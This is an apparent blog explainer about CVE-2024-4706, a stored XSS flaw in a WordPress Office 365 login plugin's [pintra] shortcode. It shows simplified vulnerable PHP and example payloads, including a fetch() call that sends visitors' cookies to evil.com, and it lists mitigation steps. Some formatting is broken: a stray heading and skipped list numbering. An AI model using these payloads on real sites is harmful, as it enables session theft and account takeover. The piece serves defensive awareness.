CVE-2024-4706 - How a Simple XSS Flaw in WordPress Plugin "Microsoft Office 365 / Azure AD | LOGIN" Exposes Sites

WordPress is no stranger to vulnerabilities, but CVE-2024-4706 is a fresh exploit that doesn’t need a security expert to understand — just a little knowledge of how WordPress plugins handle user input. In this article, we'll break down what this CVE is, show you how it works, and explain how you can protect yourself if you run the plugin in question.

What is CVE-2024-4706?

CVE-2024-4706 is a vulnerability found in the "Microsoft Office 365 / Azure AD | LOGIN" WordPress plugin, affecting all versions up to and including 27.2. This plugin is a popular tool for WordPress sites wanting to let users log in using Microsoft Office 365 or Azure AD credentials.

The flaw is a Stored Cross-Site Scripting (XSS) vulnerability, specifically via the plugin's [pintra] shortcode. Because the plugin doesn't sanitize or escape user-supplied attributes properly, attackers with even limited, authenticated access (like a WordPress "Contributor" user) can inject malicious JavaScript that runs whenever someone opens the affected page.

References

- Wordfence Advisory: CVE-2024-4706
- NVD – CVE-2024-4706
- Plugin homepage

Why is This Bad?

With CVE-2024-4706, a low-level, trusted user (Contributor or above) can add a special shortcode [pintra] to a post or page with their own malicious JavaScript attached as an attribute. When other users visit the affected pages, their browsers execute this script.

Taking over WordPress admin accounts

All this with only minimal access — attackers don’t need to be full admins.

How the Exploit Works

The problem is in the way the plugin uses the [pintra] shortcode. It lets users add things like [pintra url="..."] wherever shortcodes are accepted. But it doesn’t properly check what’s put inside those attributes!

Let's say Jane is a Contributor on your site. Jane writes a WordPress post using this shortcode

[pintra url='" onmouseover="alert(\'XSS\')"']

Because the plugin doesn't sanitize or escape url, anyone mousing over the output triggers the alert. Or, an attacker can inject more serious JavaScript, like stealing cookies.

Vulnerable plugin code (simplified PHP)

function pintra_shortcode($atts) {
    $url = $atts['url']; // Not sanitized!!
    return '<a href="' . $url . '">Sign in with Office 365</a>';
}
add_shortcode('pintra', 'pintra_shortcode');

Exploit in practice

[pintra url="javascript:alert('XSS')"]

Or, using an event handler

[pintra url="#" onmouseover="fetch('https://evil.com/steal?cookie='+document.cookie)"]

When anyone clicks or mouses over this link, the attacker’s code runs.

Steps to mitigate

1. Update immediately: Check for a fixed version of the plugin. If none is available, disable or uninstall the plugin until an update is released.

Restrict contributor access: Only grant trusted users contributor or higher roles until patched.

3. Scan your site: Use tools like Wordfence or WPScan to check for malicious shortcodes or unknown scripts.
4. Audit content: Search for any [pintra] shortcodes in existing content, and remove any suspicious uses.

Final Thoughts

Stored XSS vulnerabilities like CVE-2024-4706 are dangerous because they live inside your site content and can be triggered any time a page or post loads. All it takes is a trusted-but-compromised contributor or a disgruntled insider.

If you're running Microsoft Office 365 / Azure AD | LOGIN plugin for WordPress, update now or disable it until patched. Your site and your visitors’ safety depend on it.

Stay safe — and always keep your plugins up-to-date!

Timeline

Published on: 05/23/2024 08:15:08 UTC
Last modified on: 08/01/2024 20:47:41 UTC